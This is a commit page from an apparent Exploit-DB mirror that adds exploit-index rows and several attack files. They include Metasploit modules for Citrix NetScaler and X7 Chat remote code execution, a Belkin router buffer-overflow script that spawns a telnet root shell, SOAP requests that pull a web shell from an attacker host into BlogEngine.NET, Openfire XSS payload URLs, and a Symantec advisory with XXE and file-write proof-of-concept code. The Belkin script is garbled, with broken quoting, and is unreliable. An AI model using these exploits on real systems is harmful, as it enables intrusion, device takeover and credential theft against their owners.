bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 11_08_2014

Browse source
This commit is contained in:
Offensive Security 2014-11-08 04:45:23 +00:00
parent 025d2b1b6e
commit af904ead9b
24 changed files with 1600 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

23
files.csv
View file

@ -31674,3 +31674,26 @@ id,file,description,date,author,platform,type,port
35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-01,d3c0der,windows,dos,0
35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 'zend_strtod()' Function Floating-Point Value Denial of Service Vulnerability",2011-01-03,"Rick Regan",php,dos,0
35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 'getURL.php' SQL Injection Vulnerability",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0
35166,platforms/windows/remote/35166.c,"Ace Video Workshop 1.2.0.0 'ir50_lcs.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-03,d3c0der,windows,remote,0
35167,platforms/php/webapps/35167.txt,"Joomla 1.0.x 'ordering' Parameter Cross-Site Scripting Vulnerability",2011-01-06,"Aung Khant",php,webapps,0
35168,platforms/asp/webapps/35168.txt,"BlogEngine.NET 1.6 Directory Traversal Vulnerability and Information Disclosure Vulnerability",2011-01-05,"Deniz Cevik",asp,webapps,0
35169,platforms/jsp/webapps/35169.txt,"Openfire 3.6.4 Multiple Cross-Site Scripting Vulnerabilities",2011-01-05,"Walikar Riyaz Ahemed Dawalmalik",jsp,webapps,0
35170,platforms/hardware/remote/35170.txt,"Lexmark X651de Printer Ready Message Value HTML Injection Vulnerability",2011-01-06,"dave b",hardware,remote,0
35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 Multiple DLL Loading Arbitrary Code Execution Vulnerability",2011-01-05,d3c0der,windows,remote,0
35172,platforms/php/webapps/35172.txt,"PHP MicroCMS 1.0.1 'page_text' Parameter Cross Site Scripting Vulnerability",2011-01-06,"High-Tech Bridge SA",php,webapps,0
35173,platforms/linux/dos/35173.txt,"MINIX 3.3.0 Local Denial of Service PoC",2014-11-06,nitr0us,linux,dos,0
35177,platforms/windows/local/35177.py,"i-FTP 2.20 - Buffer Overflow SEH Exploit",2014-11-06,metacom,windows,local,0
35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash PoC",2014-11-06,metacom,windows,dos,0
35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash PoC",2014-11-06,metacom,windows,dos,0
35180,platforms/bsd/remote/35180.rb,"Citrix NetScaler SOAP Handler Remote Code Execution",2014-11-06,metasploit,bsd,remote,0
35181,platforms/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",jsp,webapps,0
35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 vmx86.sys Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0
35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution",2014-11-06,metasploit,php,remote,80
35184,platforms/hardware/remote/35184.py,"Belkin n750 jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080
35185,platforms/php/webapps/35185.txt,"WonderCMS 0.3.3 'editText.php' Cross Site Scripting Vulnerability",2011-01-04,"High-Tech Bridge SA",php,webapps,0
35186,platforms/php/webapps/35186.txt,"WikLink 0.1.3 Multiple SQL Injection Vulnerabilities",2011-01-10,"Aliaksandr Hartsuyeu",php,webapps,0
35187,platforms/php/webapps/35187.txt,"Joostina 1.3 'index.php' Cross Site Scripting Vulnerability",2011-01-08,MustLive,php,webapps,0
35188,platforms/windows/remote/35188.py,"SolarFTP 2.1.1 'PASV' Command Remote Buffer Overflow Vulnerability",2011-01-10,"John Leitch",windows,remote,0
35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0

Can't render this file because it is too large.

24
platforms/asp/webapps/35168.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/45681/info
BlogEngine.NET is prone to a directory-traversal vulnerability and an information-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting the issues may allow an attacker to obtain sensitive information and upload arbitrary files to the webserver that could aid in further attacks.
BlogEngine.NET 1.6 is vulnerable.
The following example SOAP requests are available:
1. <GetFile xmlns="http://dotnetblogengine.net/">
<source>c:\Windows\win.ini</source>
<destination>string</destination>
</GetFile>
2. <GetFile xmlns="http://dotnetblogengine.net/">
<source>c:\webroot\blog\App_Data\users.xml</source>
<destination>../../aa.txt</destination>
</GetFile>
3. <GetFile xmlns="http://dotnetblogengine.net/">
<source>http://attacker/evil.aspx</source>
<destination>/../../cmd.aspx</destination>
</GetFile>

167
platforms/bsd/remote/35180.rb Executable file
View file

@ -0,0 +1,167 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Brute
def initialize(info={})
super(update_info(info,
'Name' => "Citrix NetScaler SOAP Handler Remote Code Execution",
'Description' => %q{
This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
The vulnerability exists in the SOAP handler, accessible through the web interface. A
malicious SOAP requests can force the handler to connect to a malicious NetScaler config
server. This malicious config server can send a specially crafted response in order to
trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
code with the privileges of the web server running the SOAP handler. This module has been
tested successfully on the NetScaler Virtual Appliance 450010.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Bradley Austin', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
],
'Payload' =>
{
'Space' => 1024,
'MinNops' => 512,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Arch' => ARCH_X86,
'Platform' => 'bsd',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'NetScaler Virtual Appliance 450010',
{
'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
'Offset' => 606,
'Ret' => 0xffffda94, # Try before bruteforce...
# The virtual appliance lacks of security mitigations like DEP/ASLR, since the
# process being exploited is an apache child, the bruteforce attack works fine
# here.
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
'Stop' => { 'Ret' => 0xfffdf000 }, # top of the stack
'Step' => 256
}
}
],
],
'DisclosureDate' => "Sep 22 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),
OptAddress.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine reachable by the target", ]),
OptPort.new('SRVPORT', [true, "The local port to listen on.", 3010])
], self.class)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def exploit
if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])
fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')
end
if check != Exploit::CheckCode::Detected
fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
end
start_service
if target.ret
@curr_ret = target.ret
send_request_soap
Rex.sleep(3)
if session_created?
return
end
end
super
end
def brute_exploit(addrs)
@curr_ret = addrs['Ret']
send_request_soap
end
def send_request_soap
soap = <<-EOS
<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<ns7744:login xmlns:ns7744="urn:NSConfig">
<username xsi:type="xsd:string">nsroot</username>
<password xsi:type="xsd:string">nsroot</password>
<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>
<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>
<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>
</ns7744:login>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
EOS
print_status("#{peer} - Sending soap request...")
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'data' => soap
}, 1)
end
def on_client_data(c)
print_status("#{c.peerhost} - Getting request...")
data = c.get_once(2)
req_length = data.unpack("v")[0]
req_data = c.get_once(req_length - 2)
unless req_data.unpack("V")[0] == 0xa5a50000
print_error("#{c.peerhost} - Incorrect request... sending payload anyway")
end
print_status("#{c.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")
my_payload = Rex::Text.pattern_create(target['Offset'])
my_payload << [@curr_ret, target['RwPtr']].pack("V*")
my_payload << payload.encoded
pkt = [my_payload.length + 6].pack("v")
pkt << "\x00\x00\xa5\xa5"
pkt << my_payload
c.put(pkt)
c.disconnect
end
end

9
platforms/hardware/remote/35170.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45688/info
Lexmark Printer X651de is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected printer web interface application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Lexmark Printer X651de is vulnerable; other versions may also be affected.
nmap --script=pjl-ready-message.nse --script-args='pjl_ready_message="<script>alert(1);</script>"'

23
platforms/hardware/remote/35184.py Executable file
View file

@ -0,0 +1,23 @@
"""
Source: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/
A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103_WW_1.10.16m, allows an unauthenticated remote attacker to gain root access to the operating system of the affected device. The guest network functionality is default functionality and is delivered over an unprotected wifi network.
Successful exploitation of the vulnerability enables the attacker to gain full control of the affected router.
"""
#!/usr/bin/python
#Title : Belkin n750 buffer overflow in jump login parameter
#Date : 28 Jan 2014
#Author : Discovered and developed by Marco Vaz <mv@integrity.pt>
#Testd on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C)
import httplib
headers = {}
body= GO=&jump=+ a*1379 +%3b+ /usr/sbin/utelnetd -d +%3b&pws=\n\n
conn = httplib.HTTPConnection(192.168.169.1?,8080)
conn.request(POST, /login.cgi, body, headers)
response = conn.getresponse()
data = response.read()
print data

51
platforms/jsp/webapps/35169.txt Executable file
View file

@ -0,0 +1,51 @@
source: http://www.securityfocus.com/bid/45682/info
Openfire is prone to multiple cross-site-scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials; other attacks are also possible.
Openfire 3.6.4 is vulnerable; other versions may also be affected.
http://www.example.com/login.jsp?url=&username=test" onfocus=javascript:window.location.assign(&#039;http://www.google.com&#039;);">
http://www.example.com/login.jsp?url=hello" onfocus=javascript:window.location.assign(&#039;http://www.google.com&#039;);">
http://www.example.com/security-audit-viewer.jsp?range=15&username="><script>alert(&#039;xss&#039;)</script>&search=Search
http://www.example.com/user-create.jsp?username=test"><script>alert(&#039;xss&#039;)</script>
http://www.example.com/user-create.jsp?name=test"><script>alert(&#039;xss&#039;)</script>
http://www.example.com/user-create.jsp?email=test"><script>alert(&#039;xss&#039;)</script>
http://www.example.com/plugins/search/advance-user-search.jsp?criteria=test"><script>alert(&#039;xss&#039;)</script>
http://www.example.com/user-roster-add.jsp?username=test<script>alert(&#039;xss&#039;)</script>
http://www.example.com/user-roster-add.jsp?username=user&jid=1&nickname=<script>alert(&#039;XSS&#039;)</script>&email=<script>alert(&#039;XSS&#039;)</script>&add=Add+Item
http://www.example.com/user-roster.jsp?username=test<script>alert(document.cookie)</script>
http://www.example.com/user-lockout.jsp?username=test<script>alert(&#039;xss&#039;)</script>
http://www.example.com/group-create.jsp?name=test<script>alert(&#039;xss&#039;)</script>&description=<script>alert(&#039;xss&#039;)</script>&create=Create+Group
http://www.example.com/group-edit.jsp?creategroupsuccess=true&group=test<script>alert(&#039;xss&#039;)</script>
http://www.example.com/group-delete.jsp?group=<script>alert(&#039;xss&#039;)</script>
http://www.example.com/muc-room-edit-form.jsp?save=true&create="><script>alert(&#039;XSS&#039;)</script>&roomconfig_persistentroom="><script>alert(&#039;XSS&#039;)</
script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert(&#039;XSS&#039;)</script>&roomconfig_roomdesc=<script>alert(&#039;XSS&#039;)</script>&room_
topic=<script>alert(&#039;XSS&#039;)</script>&roomconfig_maxusers="><script>alert(&#039;XSS&#039;)</script>&roomconfig_presencebroadcast=<script>alert(&#039;XSS&#039;)</scrip
t>true&roomconfig_presencebroadcast2="><script>alert(&#039;XSS&#039;)</script>&roomcofig_presencebroadcast3=true"><script>alert(&#039;XSS&#039;)</script>&roomconfi
g_roomsecret="><script>alert(&#039;XSS&#039;)</script>&roomconfig_roomsecret2="><script>alert(&#039;XSS&#039;)</script>&roomconfig_whois=moderator"><script>alert(&#039;X
SS&#039;)</script>&roomconfig_publicroom=true"><script>alert(&#039;XSS&#039;)</script>&roomconfig_canchangenick=true"><script>alert(&#039;XSS&#039;)</script>&roomconfig_
registration=true"><script>alert(&#039;XSS&#039;)</script>&Submit=Save+Changes
http://www.example.com/muc-room-delete.jsp?roomJID="><script>alert(&#039;XSS&#039;)</script>&create=false
http://www.example.com/plugins/clientcontrol/create-bookmark.jsp?urlName="><script>alert(&#039;XSS&#039;)</script>&url="><script>alert(&#039;XSS&#039;)</script>&user
s="><script>alert(&#039;XSS&#039;)</script>&groups="><script>alert(&#039;XSS&#039;)</script>&rss=off&createURLBookmark=Create&type=url
http://www.example.com/plugins/clientcontrol/spark-form.jsp?optionalMessage=&lt;/textarea&gt;<script>alert(&#039;XSS&#039;)</script>&submit=Update+Spark+Versions

254
platforms/jsp/webapps/35181.txt Executable file
View file

@ -0,0 +1,254 @@
SEC Consult Vulnerability Lab Security Advisory < 20141106-0 >
=======================================================================
title: XXE & XSS & Arbitrary File Write vulnerabilities
product: Symantec Endpoint Protection
vulnerable version: 12.1.4023.4080
fixed version: 12.1.5 (RU 5)
impact: Critical
CVE number: CVE-2014-3437, CVE-2014-3438, CVE-2014-3439
homepage: http://www.symantec.com
found: 2014-07-01
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Symantec Endpoint Protection is a client-server solution that protects
laptops, desktops, Windows and Mac computers, and servers in your network
against malware. Symantec Endpoint Protection combines virus protection with
advanced threat protection to proactively secure your computers against known
and unknown threats.
Symantec Endpoint Protection protects against malware such as viruses, worms,
Trojan horses, spyware, and adware. It provides protection against even the
most sophisticated attacks that evade traditional security measures, such as
rootkits, zero-day attacks, and spyware that mutates. Providing low maintenance
and high power, Symantec Endpoint Protection communicates over your network to
automatically safeguard for both physical systems and virtual systems against
attacks."
Source:
https://www.symantec.com/endpoint-protection
https://www.symantec.com/business/support/index?page=content&id=DOC6153
Business recommendation:
------------------------
Attackers are able to perform denial-of-service attacks against the Endpoint
Protection Manager which directly impacts the effectiveness of the client-side
endpoint protection. Furthermore, session identifiers of users can be stolen
to impersonate them and gain unauthorized access to the server.
All of these attacks can have a severe impact on the security infrastructure.
An update to the latest version (12.1.5 RU 5) is highly recommended.
Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection (XXE) [CVE-2014-3437]
Multiple XXE vulnerabilities were found in the Endpoint Protection Manager
application. An attacker needs to perform MitM attacks to impersonate
securityresponse.symantec.com (eg. via DNS poisoning/spoofing/hijacking,
ARP spoofing, QUANTUM-style attacks, ...) to inject malicious XML code.
These vulnerabilities can be used to execute server side request
forgery (SSRF) attacks used for portscanning/fingerprinting, denial of service,
file disclosure as well as attacks against functionality that is only
exposed internally (see CVE-2013-5015 and issue #3).
Note:
The exploitation scenario proves that the previous command execution via
SQL injection was exploitable for an external attacker with the ability to
manipulate internet traffic _without any prior knowledge_ of the target system.
2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]
Endpoint Protection Manager suffers from a reflected cross-site scripting
vulnerability, which allows an attacker to steal other users' sessions, to
impersonate other users and to gain unauthorized access to the admin interface.
3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]
Arbitrary files can be written or overwritten by an unauthenticated attacker.
The target file is truncated in the process which results in Denial of Service.
However it might be possible to write files with arbitrary content nonetheless.
Proof of concept:
-----------------
1) XML External Entity Injection (XXE) [CVE-2014-3437]
The Symantec Protection Center component downloads XML files from
http://securityresponse.symantec.com for information purposes.
By impersonating securityresponse.symantec.com (eg. via DNS
poisoning/spoofing/hijacking, ARP spoofing, QUANTUM-style attacks, ...) an
attacker can inject malicious XML code into the file contents and thus exploit
XXE vulnerabilities.
For example by offering the following XML code at the URL
http://securityresponse.symantec.com/avcenter/deepsightkiosk/9.xml
arbitrary files can be disclosed via the Symantec Protection Center login
page at https://<HOST>:8443/portal/Login.jsp
===============================================================================
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY e SYSTEM 'file:///c:/windows/win.ini'> ]>
<data>
<regular>
<text>&e;</text>
</regular>
<outbreak></outbreak>
<threatcon>1</threatcon>
</data>
===============================================================================
Server Side Request Forgery (SSRF) can be exploited like in the following
example that sets the application log level to "log all messages" eg. via
http://securityresponse.symantec.com/avcenter/deepsightkiosk/10.xml
===============================================================================
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY e SYSTEM
'http://localhost:9090/servlet/ConsoleServlet?ActionType=ConfigServer&logLevel=ALL'> ]>
<foo>&e;</foo>
===============================================================================
Furthermore some files can be exfiltrated to remote servers via the
techniques described in:
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]
At least the following URLs are vulnerable to XSS:
https://<HOST>:8443/console/Highlander_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://<HOST>:8443/portal/Loading.jsp?uri=Ij48c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0Pj9BQUFBPUJCQkIiPjxzY3JpcHQ%2bYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2b
3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]
A flaw in ConsoleServlet allows an attacker to specify the application server
thread name via the ActionType parameter. As the thread name is used in
the pattern that is passed to the java.util.logging.FileHandler constructor
by the logging component (ServerLogger) an attacker can define the log file
path. By causing an exception in the thread, the log file is written to
disk.
The following code snippet causes an exception by terminating the TCP
connection before the server has finished writing the response to the socket.
ActionType=/../../../../../../../../../../WINDOWS/win.ini%00 causes the win.ini
file to be truncated.
===============================================================================
import socket
import struct
HOST = '<HOST>'
PORT = 9090
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
l_onoff = 1
l_linger = 0
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,struct.pack('ii', l_onoff, l_linger))
msg = '''GET
/servlet/ConsoleServlet?ActionType=/../../../../../../../../../../WINDOWS/win.ini%00
HTTP/1.1
Host: SYMEPP
EvilContent: <?php evilcode(); ?>
'''
s.sendall(msg)
s.shutdown(socket.SHUT_RD)
===============================================================================
ActionType=/../../Inetpub/Reporting/evil.php%00 causes the (empty) file
evil.php to be written into the Apache webroot.
ActionType=/../../Inetpub/Reporting/evil.php causes the file
evil-0.log to be written into the Apache webroot.
If the application log level has been set to "DEBUG" (which can be achieved
via XXE, see issue #1) the file content includes all headers passed in the
HTTP request (including the EvilContent header in the example above). However
the file will not be processed by PHP because of the .log extension. Due to
the complex nature of the Windows filesystem addressing modes (legacy/DOS,
ADS, etc.) it is entirely possible that this limitation can be bypassed.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Endpoint Protection
version 12.1.4023.4080, which was the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
2014-07-11: Initial contact to secure@symantec.com
2014-07-29: Ask for status at secure@symantec.com
2014-08-01: Conference call about status, extended grace period to 2014-10-31
September/October: Several discussions / rechecks of the vulnerabilities
2014-11-06: Coordinated release of the advisory
Solution:
---------
1) XML External Entity Injection (XXE) [CVE-2014-3437]
Update to version 12.1.5 RU 5
2) Reflected Cross-Site-Scripting (XSS) [CVE-2014-3438]
Update to version 12.1.5 RU 5
3) Unauthenticated Arbitrary File Write/Overwrite [CVE-2014-3439]
The update to version 12.1.5 RU 5 only partially mitigates the vulnerability.
Path Traversal is no longer possible, which reduces the severity to
low/medium. The vendor claims that it will be entirely solved in the next
version (12.1.5 RU6).
For further information see the security advisory of the vendor:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141105_00
Workaround:
-----------
See Symantec security advisory for further mitigations.
Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Stefan Viehböck / @2014

53
platforms/linux/dos/35173.txt Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: MINIX 3.3.0 Local Denial of Service
# Exploit Author: nitr0us
# Vendor Homepage: www.minix3.org
# Software Link: http://www.minix3.org/download/index.html
# Version: 3.3.0
# Tested on: MINIX 3.3.0 x86
Attached three PoCs (malformed ELFs) and a screenshot of the panic.
http://www.exploit-db.com/sploits/35173.zip
----
MINIX 3.3.0 is prone to local kernel panic due to malformed program headers in an ELF executable.
Attached three PoCs that panicked the OS, and their modified fields:
=================================================================================
[+] Malformed ELF: 'orc_0064':
[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_vaddr = 0x08056919, p_paddr = 0xcafed00d) | PHT[0] rule [03]
executed
(PHT[0]->p_flags = 0xf0000005) | PHT[0] rule [10] executed
(PHT[0]->p_flags = 0xfff00005) | PHT[0] rule [15] executed
(PHT[3]->p_type = 0x0) | PHT[3] rule [01] executed
(PHT[3]->p_vaddr = 0x1905af52, p_paddr = 0x1905af52) | PHT[3] rule [03]
executed
(PHT[3]->p_type = 0x70031337) | PHT[3] rule [06] executed
(PHT[PT_LOAD].p_vaddr reordered [descending]) | PHT rule [20] executed
=================================================================================
[+] Malformed ELF: 'orc_0090':
[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_offset = 0xffff0000) | PHT[0] rule [02] executed
(PHT[3]->p_type = 0x7defaced) | PHT[3] rule [06] executed
=================================================================================
[+] Malformed ELF: 'orc_0092':
[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_filesz = 0x0004fdec, p_memsz = 0x41424344) | PHT[0] rule [04]
executed
(PHT[3]->p_type = 0x6fffffff) | PHT[3] rule [14]
=================================================================================

193
platforms/php/remote/35183.rb Executable file
View file

@ -0,0 +1,193 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
'Description' => %q{
This module exploits a post-auth vulnerability found in X7 Chat versions
2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which
uses preg_replace() function with the /e modifier. This allows a remote
authenticated attacker to execute arbitrary PHP code in the remote machine.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Fernando Munoz <fernando[at]null-life.com>', # discovery & module development
'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
],
'References' =>
[
# Using this URL because isn't nothing else atm
['URL', 'https://github.com/rapid7/metasploit-framework/pull/4076']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Generic (PHP Payload)', {}]],
'DisclosureDate' => 'Oct 27 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [ true, 'Username to authenticate as', '']),
OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', '']),
OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),
], self.class)
end
def check
res = exec_php('phpinfo(); die();', true)
if res && res.body =~ /This program makes use of the Zend/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Unknown
end
end
def exec_php(php_code, is_check = false)
# remove comments, line breaks and spaces of php_code
payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
# clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals)
while Rex::Text.encode_base64(payload_clean) =~ /=/
payload_clean = "#{ payload_clean } "
end
payload_b64 = Rex::Text.encode_base64(payload_clean)
cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }"
cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }"
rand_text = Rex::Text.rand_text_alpha_upper(5, 8)
print_status("Trying for version 2.0.2 up to 2.0.5.1")
print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {
'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
},
'vars_get' => {
# value compatible with 2.0.2 up to 2.0.5.1
'act' => 'user_cp',
'cp_page' => 'msgcenter',
'to' => datastore['USERNAME'],
'subject' => rand_text,
'body' => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
}
})
unless res && res.code == 200
print_error("Sending the message (#{ rand_text }) has failed")
return false
end
if res.body =~ /([0-9]*)">#{ rand_text }/
message_id = Regexp.last_match[1]
user_panel = 'user_cp'
else
print_error("Could not find message (#{ rand_text }) in the message list")
print_status("Retrying for version 2.0.0 up to 2.0.1 a1")
print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {
'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
},
'vars_get' => {
# value compatible with 2.0.0 up to 2.0.1 a1
'act' => 'usercp',
'cp_page' => 'msgcenter',
'to' => datastore['USERNAME'],
'subject' => rand_text,
'body' => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }",
}
})
unless res && res.code == 200
print_error("Sending the message (#{ rand_text }) has failed")
return false
end
if res.body =~ /([0-9]*)">#{ rand_text }/
message_id = Regexp.last_match[1]
user_panel = 'usercp'
else
print_error("Could not find message (#{ rand_text }) in the message list")
return false
end
end
print_status("Accessing message (#{ rand_text })")
print_status("Sending payload in HTTP header '#{ rand_text }'")
if is_check
timeout = 20
else
timeout = 3
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {
'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
rand_text => payload_b64,
},
'vars_get' => {
'act' => user_panel,
'cp_page' => 'msgcenter',
'read' => message_id,
}
}, timeout)
res_payload = res
print_status("Deleting message (#{ rand_text })")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {
'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };",
},
'vars_get' => {
'act' => user_panel,
'cp_page' => 'msgcenter',
'delete' => message_id,
}
})
if res && res.body =~ /The message has been deleted/
print_good("Message (#{ rand_text }) removed")
else
print_error("Removing message (#{ rand_text }) has failed")
return false
end
# if check return the response
if is_check
return res_payload
else
return true
end
end
def exploit
unless exec_php(payload.encoded)
fail_with(Failure::Unknown, "#{peer} - Exploit failed, aborting.")
end
end
end

7
platforms/php/webapps/35167.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45679/info
